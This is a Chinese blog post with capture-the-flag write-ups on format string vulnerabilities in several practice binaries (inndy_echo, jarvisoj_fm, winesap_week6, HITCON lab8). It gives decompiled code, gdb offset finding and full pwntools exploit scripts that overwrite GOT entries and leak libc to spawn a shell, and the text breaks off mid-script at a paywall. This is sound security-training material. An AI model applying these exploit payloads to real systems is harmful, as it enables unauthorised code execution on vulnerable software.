c语言格式化字符漏洞,格式化字符串漏洞题目练习

最新推荐文章于 2022-11-29 08:52:08 发布
最新推荐文章于 2022-11-29 08:52:08 发布
阅读量889 收藏
点赞数
文章标签: c语言格式化字符漏洞
整合一下最近做的格式化字符串题目的练习,把wp给写一下,方便对总结对这个漏洞的利用套路和技巧。inndy_echo保护和arch[*] '/media/psf/mypwn2/buuctf/inndy_echo/echo'Arch: i386-32-littleRELRO: Partial RELROStack: No canary foundNX: NX enabl...
摘要由CSDN通过智能技术生成

整合一下最近做的格式化字符串题目的练习,把wp给写一下,方便对总结对这个漏洞的利用套路和技巧。

inndy_echo

保护和arch

[*] '/media/psf/mypwn2/buuctf/inndy_echo/echo'

Arch: i386-32-little

RELRO: Partial RELRO

Stack: No canary found

NX: NX enabled

PIE: No PIE (0x8048000)

ida分析

int __cdecl __noreturn main(int argc, const char **argv, const char **envp)

{

char s; // [esp+Ch] [ebp-10Ch]

unsigned int v4; // [esp+10Ch] [ebp-Ch]

v4 = __readgsdword(0x14u);

setvbuf(stdin, 0, 2, 0);

setvbuf(stdout, 0, 2, 0);

do

{

fgets(&s, 256, stdin);

printf(&s);

}

while ( strcmp(&s, "exit\n") );

system("echo Goodbye");

exit(0);

}

可以看到会无限的打印你输入的东西,并且有system这个函数,利用思路也就是GOT hijack,把printf函数的got改为system的plt,注意要单次printf多次写入,改为system的plt后,再传过去 /bin/sh ,此时就会变成 system(/bin/sh)

gdb调试

gdb-peda$ stack 0x20

0000| 0xffffd250 --> 0xffffd26c ("AAAA\n")

0004| 0xffffd254 --> 0x100

0008| 0xffffd258 --> 0xf7fb25a0 --> 0xfbad208b

0012| 0xffffd25c --> 0x0

0016| 0xffffd260 --> 0xf7ffd000 --> 0x23f40

0020| 0xffffd264 --> 0x80482e7 ("__libc_start_main")

0024| 0xffffd268 --> 0xf63d4e2e

0028| 0xffffd26c ("AAAA\n")

gdb-peda$ fmtarg 0xffffd26c

The index of format argument : 7 ("\%6$p")

确定偏移是7,打算一会写payload时候需要补齐,就 .ljust 补成0x20的,也就是 offset = 7 + 0x20/4 = 15

exp

from pwn import *

context.log_level = 'debug'

context.arch = 'i386'

# io = process('./echo')

io = remote('node3.buuoj.cn',26990)

system_plt = 0x08048400

printf_got = 0x0804A010

def fmt_short(prev,val,idx,byte = 2):

result = ""

if prev < val :

result += "%" + str(val - prev) + "c"

elif prev == val :

result += ''

else :

result += "%" + str(256**byte - prev + val) + "c"

result += "%" + str(idx) + "$hn"

return result

prev = 0

payload = ""

key = 0x08048400

for i in range(2):

payload +=fmt_short(prev,(key >> 16*i) & 0xffff,15+i)

prev = (key >> i*16) & 0xffff

payload = payload.ljust(0x20,'a') + p32(printf_got) + p32(printf_got+2)

raw_input('->')

io.sendline(payload)

io.send('/bin/sh\x00')

io.interactive()

换一种就是用pwntools模块,面对32位,这种情况还是很好用的:

from pwn import *

context.log_level = 'debug'

context.arch = 'i386'

# io = process('./echo')

io = remote('node3.buuoj.cn',26990)

system_plt = 0x08048400

printf_got = 0x0804A010

payload = fmtstr_payload(7,{printf_got : system_plt})

io.sendline(payload)

io.send('/bin/sh\x00')

io.interactive()

[DEBUG] Sent 0x3c bytes:

00000000 10 a0 04 08 11 a0 04 08 12 a0 04 08 13 a0 04 08 │····│····│····│····│

00000010 25 32 34 30 63 25 37 24 68 68 6e 25 31 33 32 63 │%240│c%7$│hhn%│132c│

00000020 25 38 24 68 68 6e 25 31 32 38 63 25 39 24 68 68 │%8$h│hn%1│28c%│9$hh│

00000030 6e 25 34 63 25 31 30 24 68 68 6e 0a │n%4c│%10$│hhn·││

0000003c

可以看一下其生成的payload,把目标地址信息放在开头,在64位是肯定是不可行的。

jarvisoj_fm

ida分析

int __cdecl main(int argc, const char **argv, const char **envp)

{

char buf; // [esp+2Ch] [ebp-5Ch]

unsigned int v5; // [esp+7Ch] [ebp-Ch]

v5 = __readgsdword(0x14u);

be_nice_to_people();

memset(&buf, 0, 0x50u);

read(0, &buf, 0x50u);

printf(&buf);

printf("%d!\n", *(_DWORD *)&x);

if ( *(_DWORD *)&x != 4 )

return 0;

puts("running sh...");

system("/bin/sh");

return 0;

}

十分简单的题目,检验 x 值是否为4,如果是4(数字),就直接给你shell了。

exp

from pwn import *

context.log_level = 'debug'

# io = process('./fm')

io = remote('node3.buuoj.cn',26915)

# io.recv()

payload = p32(0x0804A02C) + '%11$hn'

raw_input('->')

io.sendline(payload)

io.interactive()

winesap_week6

源码:

#include

int main() {

setvbuf(stdout, 0, _IONBF, 0);

alarm(180);

char str[100];

while(gets(str)) {

printf(str);

}

return 0;

}

需要编译为64位,这个题比起来第一个也就是没有了system函数,需要自己泄漏一下libc的base,算出system地址,然后还是GOT hijack就可以了。

EXP

from pwn import *

import time

context.arch = 'amd64'

context.log_level = 'debug'

io = process('./fmt1')

elf = ELF('./fmt1')

libc = elf.libc

printf_got = 0x0000601020

io.sendline('%21$p')

io.recvuntil('0x')

libc_base = int((io.recv(12)),16) - 240 -libc.symbols['__libc_start_main']

system_addr = libc_base + libc.symbols['system']

print('leak_libc_base: ' + hex(libc_base))

print('system_addr: ' + hex(system_addr))

def fmt_short(prev,val,idx,byte = 2):

result = ""

if prev < val :

result += "%" + str(val - prev) + "c"

elif prev == val :

result += ''

else :

result += "%" + str(256**byte - prev + val) + "c"

result += "%" + str(idx) + "$hn"

return result

prev = 0

payload = ""

key = system_addr

for i in range(3):

payload +=fmt_short(prev,(key >> 16*i) & 0xffff,12+i)

prev = (key >> i*16) & 0xffff

payload = payload.ljust(0x30,'a') + p64(printf_got) +p64(printf_got+2) + p64(printf_got+4)

io.sendline(payload)

sleep(1)

io.sendline('/bin/sh\x00')

io.interactive()

HITCON-Training-lab8

源码

#include

int magic = 0 ;

int main(){

char buf[0x100];

setvbuf(stdout,0,2,0);

puts("Please crax me !");

printf("Give me magic :");

read(0,buf,0x100);

printf(buf);

if(magic == 0xda){

system("cat /home/craxme/flag");

}else if(magic == 0xfaceb00c){

system("cat /home/craxme/craxflag");

}else{

puts("You need be a phd");

}

}

编译为64位。

分析

(这个题目是纯粹就是为了练习任意地址写入的,我这里就直接写exp拿sheel了。)可以看到当再一次printf,之后程序便停止了,且结束前有puts函数。

思路就是可以GOT hijack put函数的GOT为read函数哪里,让其call puts函数时返回到read函数,并且在这次printf函数漏洞利用时,也把printf函数的GOT改为system的plt,然后传入 /bin/sh 即可。

exp

from pwn import *

context.log_level = 'debug'

context.arch = 'amd64'

io = process('./craxme')

# io = remote('127.0.0.1',8888)

magic = 0x0000060106C

io.recvuntil(':')

system_plt = 0x04005A0

puts_got = 0x0601018

ret_addr = 0x00400747

printf_got = 0x00601030

key = 0x00400747

key2 = 0x04005A0

def fmt_short(prev,val,idx,byte = 2):

result = ""

if prev < val :

result += "%" + str(val - prev) + "c"

elif prev == val :

result += ''

else :

result += "

最低0.47元/天 解锁文章
春天的花会开
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF pwn题之格式化字符串漏洞详解
lifanxin的博客
03-22 1万+
FmtStr格式化字符串类概念求偏移和任意地址写求偏移任意地址写一个例子程序分析漏洞利用wp总结 概念 在遇到pwn题中格式化字符串漏洞时,我们一般会分两大步实现漏洞利用:首先构造一个payload来寻找输入字符串到栈顶指针的偏移,然后利用偏移实现对目标地址的改写。下面我将介绍pwntools中的FmtStr类如何实现偏移的求解以及对目标地址的改写。 求偏移和任意地址写 求偏移 在格式化字符串漏洞利用中,我们一般都是这样手动构造payload进行偏移求解的,如下图所示,开头输入方便定位的字符串aaaa,然后
pwn刷题num10-----格式化字符串漏洞
tbsqigongzi的博客
04-22 362
攻防世界pwn新手区string 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位,小端序 开启全部RELRO---got表不可写 开启canary保护---栈溢出需绕过canary 开启NX保护----注入的shellcode不可执行 未开启PIE----程序地址为真实地址 动态链接 英文意思是:我们是巫师,我们会给你手,你不能自己打败龙...... 我们会告诉你两个秘密......秘密 [0]是6662a0秘密[1]是6662a4 不要告诉任何人 你的
[BUUCTF]PWN——inndy_echo2(PIE+64位fmt)
mcmuyanga的博客
02-01 1489
inndy_echo2 附件 步骤 例行检查,64位程序,开启了nx和pie 本地试运行一下,看看大概的情况,猜测跟echo差不多。 64位ida载入,跟32位echo一样的代码,只是多开了一个PIE 64位的格式化字符串漏洞,它跟32位有挺大区别的,要注意‘00’的截断,不可以像32位那样一步修改到位,它一次只可修改2字节。不清楚的先看这篇文章 首先对于PIE,我们要先想办法泄露程序基址 在执行echo函数时,echo的栈帧的上一个元素存储了函数的返回地址,返回到main中,所以栈中必定有返回地址
python pwntools库 简介 主要功能有 网络 进程 文件 编解码 elf 汇编 调试
whatday的专栏
11-29 3061
Pwntools是一个工具包,使选手们在CTF期间的尽可能容易的编写EXP,并使EXP尽可能的容易阅读。有些代码每个人都写过无数次,而且每个人都有自己的方法。Pwntools的目标是以半标准的方式提供所有这些,这样你就可以停止复制粘贴相同的代码,而是使用更多稍微清晰的包装器,如pack或p32甚至。除了对日常的功能进行方便的包装外,它还提供了一套非常丰富的IO管道,将所有你曾经执行过的IO封装在一个统一的界面中。从本地攻击切换到远程攻击,或者通过SSH进行本地攻击,都只是修改一行代码的工作。
SUCTF_2019_部分复现
Lethe's Blog
09-01 5095
Web1 CheckIn 1、进入题目后是一个简单的上传页面: 先尝试上传普通的图片马,发现会显示<? in contents!,过滤了<?,可以使用<script language='php'></scrip>绕过。 修改后再次上传发现显示exif_imagetype:not image!,还用了exif_imagetype()进行检验,可以加上GIF89a...
C语言中sscanf()函数的字符串格式化用法
09-01
### 格式化字符串的组成部分 1. **赋值抑制符'%'**: - 当`*`紧跟在`%`后面时,表示不将读取的数据赋值给对应变量,而是跳过该部分。 2. **宽度限制`width`**: - 用于限制读取的字符数,防止超出预期范围。例如...
格式化字符串格式化字符串格式化字符串
05-18
在编程领域,格式化字符串是一种常见的操作,它允许我们将动态数据插入到预定义的文本模板中,以便生成具有特定结构的输出。这个过程通常涉及到字符串的拼接、变量的替换或者按照特定的规则来组织输出内容。在各种...
占位符%字符串格式化输出 – python实例
12-21
%占位符概念 and python 实例格式化字符串转换符 表2. format2.1基础语法format可以实现%所实现的,但功能更强大2.2 高阶 1. %占位符 概念 and python 实例 %是字符串运算符,被称为格式化操作符。%左边是模版或者...
C语言格式化输入输出函数详解
01-21
1、调用形式一般为:printf(“格式化控制字符串”,输出表列); 2、格式化控制字符串用于指定输出格式,它有三种形式: 1、格式说明符:规定了相应输出表列内容的输出格式,以%打头,如%d、%o等 2、转义字符:用来...
C语言格式化字符串的输出格式
08-04
C语言格式化字符串的输出格式 C语言格式化字符串的输出格式是指在C语言编程中使用printf函数输出字符串的格式。printf函数是C语言标准库中的一个函数,用于将格式化字符串输出到标准输出流中。 printf函数的...
堆栈解题练习
weixin_44222568的博客
04-22 1738
惶惶乎如遗世独立,羽化而登仙。。。。。
i春秋上的几道pwn题
sopora的博客
06-17 1722
01.pwnme-50: Tag: fmtstr任意读 / 整型溢出 / ret2csu_init #encoding:utf-8 from pwn import * #context.log_level = 'debug' def leak(addr): io.sendafter('>', '2') io.sendafter('username...
逆向题解二
admin的博客
09-12 2769
MoeCTF新生赛逆向A_game step1: 先探探这个exe的底 拉到die里头。发现是个64位程序。 step2:拉到IDA64里面反编译瞅瞅源码 按F5,反编译的源码如下。 // local variable allocation has failed, the output may be wrong! int __cdecl main(int argc, const char **argv, const char **envp) { int v3; // ...
[BMZCTF20220101-reverse] checkin
weixin_52640415的博客
01-01 743
有了第一题的经验就可以开始自己处理第2题了 这个不用处理就能反编译。 int __cdecl main(int argc, const char **argv, const char **envp) { char v4[2]; // [esp+1Ah] [ebp-16Eh] BYREF _BYTE v5[34]; // [esp+1Ch] [ebp-16Ch] BYREF int v6; // [esp+3Eh] [ebp-14Ah] char Str[50]; // [esp+42h
[SUCTF2019]hardcpp
m0_46296905的博客
05-03 897
题目:[SUCTF2019]hardcpp 64位ELF文件 ida64中打开发现有两处控制流平坦化。 装好angr,使用基于angr的脚本deflat.py去除控制流平坦化,在deflat.py所在目录下打开cmd命令行输入 python deflat.py hardCpp 0x4007E0 #“python版本 + 脚本名 + 文件名 + 起始地址” 第二处控制流平坦化同理去除。 运行几分钟即可得到去除控制流平坦化之后的程序。 如果原版deflat.py出错,可以试试优化之后的deflat
一道简单的smc自解密题目
m0_62690279的博客
03-27 1031
一道简单的smc自解密题目 攻防RE_BABYRE 64位elf,拉入ida 打开main函数 int __cdecl main(int argc, const char **argv, const char **envp) { char s[24]; // [rsp+0h] [rbp-20h] BYREF int v5; // [rsp+18h] [rbp-8h] int i; // [rsp+1Ch] [rbp-4h] for ( i = 0; i <= 181; ++i )
栈溢出攻击2——绕过Canary通过后门函数拿到shell
学习记录
09-16 2154
博文中的程序:点击下载 提取码:qbdd   能看到这篇博客,我相信大家对栈溢出攻击已经有了一定的了解。一个入门级的题目就是程序中本身有后门函数,我们用后门函数的入口地址覆盖当前正在执行函数的返回地址,这样当前函数执行结束之后,就会跳到后门函数执行,从而达到攻击的目的。那么我们有没有办法防范这种攻击呢?答案是有的,我们可以不使用像read、scanf等有缓冲区溢出漏洞的函数,当然,如果无法避免这些函数的使用,我们还可以使用canary机制来保护我们的程序。canary的英文名称是金丝雀,它可以用来判断我们
二进制的保护机制
weixin_30872671的博客
05-29 252
这里主要讲的是CTF中linux下的ELF二进制文件的保护机制。在linux中有一个脚本checksec命令可以查看当前二进制文件的保护机制。任意安装一款gdb插件都会把checksec脚本包含进来。 在gdb中执行: gdb> checksec test Canary : No NX ...
pwn学习笔记(一)
qq_41560595的博客
03-18 1438
ret2text: 程序中提供了后门函数,自己复写返回地址为后门函数地址。 .bss 、.data、.text三个段是elf文件在磁盘上本来就有的文件,进入到内存后仍然存在。PIE影响这三个部分。
c语言格式化字符串%d
最新发布
07-28
%d 是C语言中用于格式化输出整数的格式化字符串。当你使用printf函数或类似的输出函数时,可以使用%d来指定要输出的整数的位置。例如: ```c int num = 10; printf("The number is %d", num); ``` 这将输出:The ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值